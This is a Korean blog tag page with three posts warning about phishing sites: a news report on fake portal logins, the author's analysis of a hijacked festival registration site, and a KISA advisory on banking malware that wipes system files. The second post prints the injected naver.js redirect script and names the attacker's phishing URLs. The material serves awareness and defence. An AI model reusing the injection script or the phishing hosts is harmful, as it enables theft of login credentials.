'피싱사이트'에 해당되는 글 3건

  1. 2015.10.01 유명 포털 사이트 위장한 피싱 웹사이트 주의
  2. 2015.08.20 네이버 로그인 정보 탈취 피싱사이트
  3. 2013.01.02 시스템 파괴 기능이 포함된 금융정보 탈취형 악성코드 피해주의
2015.10.01 19:20

유명 포털 사이트 위장한 피싱 웹사이트 주의

안랩, 사용자 아이핀 계정 탈취·악성코드 유포 가짜 웹사이트 발견

http://www.boannews.com/media/view.asp?idx=48023&skind=5


▲ 가짜 및 정상 로그인 페이지 비교


안랩(대표 권치중, www.ahnlab.com)은 최근 사용자 아이핀 계정 탈취, 악성코드 유포 목적의 정교한 가짜 포털 웹사이트를 발견했다고 밝혔다. 이에 사용자는 △의심 웹 사이트 방문 및 메일/SNS내 URL실행 자제 △응용프로그램 최신 버전 유지 △백신 업데이트 및 실시간 감시 필수 등의 주의가 필요하다고 당부했다.


[아이핀 계정 탈취 피싱 사이트 사례]

공격자는 유명 포털 로그인 화면으로 위장한 피싱 사이트를 제작하고, 사용자의 아이핀(i-PIN) 정보 탈취를 시도했다. 먼저 사용자가 메일, SNS에 첨부된 URL 등 다양한 경로로 포털 로그인 창을 위장한 피싱 사이트에 접속하면, 유명 포털을 사칭해 아이디/비밀번호를 요구하는 가짜 로그인 화면이 뜬다.


[악성코드 유포 피싱 사이트 사례]

공격자는 사용자가 구분이 어려울 정도로 유사한 웹사이트 주소(URL)와 웹사이트의 화면 구성으로 사용자를 속인다. 사용자가 페이지 상단에 삽입된 특정 이미지를 클릭하면 악성코드에 감염되도록 피싱 사이트를 제작했다.



출처 : 보안뉴스


Trackback 0 Comment 0
2015.08.20 18:43

네이버 로그인 정보 탈취 피싱사이트

여름 끝자락, 가족물총축제로 시원하게!

http://mediahub.seoul.go.kr/archives/903363


위 사이트에 게재된 뉴스 기사를 통해 아래 내용을 접하고


기사내용 일부:

참가 접수는 물총축제 홈페이지(water.ibabynews.com)에서 진행하며, 신청한 가족 중 추첨을 통해 500가족을 선발합니다.


해당 내용에 따라 참가 접수를 위해 홈페이지 방문을 했는데 아래와 같이 네이버 로그인 창이 떳다.



이는 그냥 봐도 의심 안할 수가 없는 상황이다. ㅋ

네이버 로그인을 붙일 수는 없을것 같은데 설마해서 아이디/비밀번호를 엉터리로 입력해서 로그인 해봤다.

결국 에러창이 떳고 세부내용 확인 결과 네이버 로그인 정보 탈취하는 피싱사이트 감염된 상태였다.



문제가 되는 naver.js 파일이 로딩되고 있었다.


http://www.kwanginsa.com/cd/naver.js

if(document.cookie.indexOf("do_naver=")==-1)

{


var expires=new Date();

expires.setTime(expires.getTime()+24*60*60*1000);

document.cookie="do_naver=Yes;path=/;expires="+expires.toGMTString();

var ref = document.referrer;

location.href="http://www.koreaconst.co.kr/file_upload/login.php";


}


이는 네이버 로그인 정보 탈취 피싱사이트로 이동시키고 있었다.


http://www.koreaconst.co.kr/file_upload/login.php


네이버 아이디 비밀번호를 입력하면 해커에게 고스란히 전달될 것이다.



피싱사이트 URL로 네이버 툴바가 설치된 상태에서 접속을 해보면 차단을 해준다.

하지만, 위 사이트처럼 프레임 내부에서 이동될 경우에는 안타깝게도 차단되지 않는다.


http://www.koreaconst.co.kr/file_upload/login.php


해당 피싱사이트에 접속해보면 아래와 같이 네이버와 유사한 로그인 창이 나타나게 되고

일반적인 사용자는 의심없이 네이버 아이디와 비밀번호를 입력할 것이다.



본인이 직접 네이버 사이트로 접속을 한 경우가 아니라면

네이버 아이디와 비밀번호를 요구할 경우 반드시 의심을 해보고

의심스럽다 생각될 경우 아이디와 비밀번호를 엉터리로 입력해서

정상적으로 네이버 로그인 에러 화면이 나오는지 반드시 확인되어야 할 것이다.


그리고 사이트 비밀번호는 반드시 사이트 마다 서로다른 비밀번호를 사용해야 하며

비밀번호는 주기적으로 변경을 통해 꾸준한 관리가 반드시 필요하다.

비밀번호 변경시에는 이전 사용한 비밀번호 사용을 재사용 하지 않아야 한다.


Trackback 0 Comment 0
2013.01.02 18:49

시스템 파괴 기능이 포함된 금융정보 탈취형 악성코드 피해주의

개요

  • 인터넷 뱅킹 이용 시 피싱 사이트로 유도시켜 금융정보를 탈취하는 한편 감염된 PC의 중요 시스템 파일을 삭제하여 정상적인 이용을 방해하는 악성코드에 대한 감염피해 주의
    ※ 해당 악성코드에 감염된 경우 특정일(2013년 1월 15일) 이후 윈도우 시스템 폴더의 중요 파일들을 삭제하여 
        부팅이 불가능하게 됨

 

주요특징

  • 윈도우 시스템 폴더에 아래와 같은 비정상적인 폴더를 생성하며 접근, 삭제 등이 불가능함
    ※  C:\WINDOWS\SYSTEM32\MUIS\tempblogs.


권고사항

  • P2P 등 의심스러운 사이트로부터 실행파일 다운로드 및 실행 자제
  • 출처가 불분명한 이메일의 첨부파일을 통한 감염피해를 입지 않도록 주의
  • 윈도우 및 백신 프로그램 등의 최신 보안업데이트 적용
  • 인터넷 뱅킹 이용 시 피싱 사이트로 접속되어 정보유출이 발생할 수 있으므로 정상 사이트 여부 확인
  • 향후, 이와 유사한 형태의 변종 악성코드 발생이 우려되므로 PC 이용 시 주의필요
  • 전용백신을 통한 점검 및 치료
    ※ 다운로드주소 :  http://www.boho.or.kr/kor/download/download_03_1.jsp 

 

문의사항

  • 한국인터넷진흥원 인터넷침해대응센터: 국번없이 118


Trackback 0 Comment 0